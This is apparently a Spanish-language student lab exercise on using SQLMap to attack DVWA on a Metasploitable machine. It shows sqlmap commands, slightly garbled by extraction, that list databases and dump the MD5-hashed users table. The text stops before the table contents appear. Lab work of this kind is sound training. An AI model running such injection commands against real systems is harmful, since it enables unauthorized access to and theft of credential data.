Professional Documents
Culture Documents
Actividades
Para ello, debes utilizar la herramienta SQLMap (instalada en Kali por defecto).
Tendrs que:
DESARROLLO DE LA ACTIVIDAD
Verificamos la IP de la mquina metasploitable.
Ejecutamos la siguiente sentencia para que nos muestre las bases de datos disponibles.
sqlmap -headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;
rv:54.0) Gecko/20100101 Firefox/54.0" -cookie="security=low"
PHPSESSID=215021843c8f7280a79c68b452ffce6" u
http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"
-dbs
Tabla users
De igual forma se usa la misma sentencia, pero cambiamos el nombre de la tabla, as:
sqlmap -headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;
rv:54.0) Gecko/20100101 Firefox/54.0" -cookie="security=low"
PHPSESSID=215021843c8f7280a79c68b452ffce6" u
http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"
batch dump T users D dvwa
Adems de mostrarnos el contenido, nos indica que el contenido de la tabla users tiene
encriptacin md5.
El contenido de la tabla es el siguiente: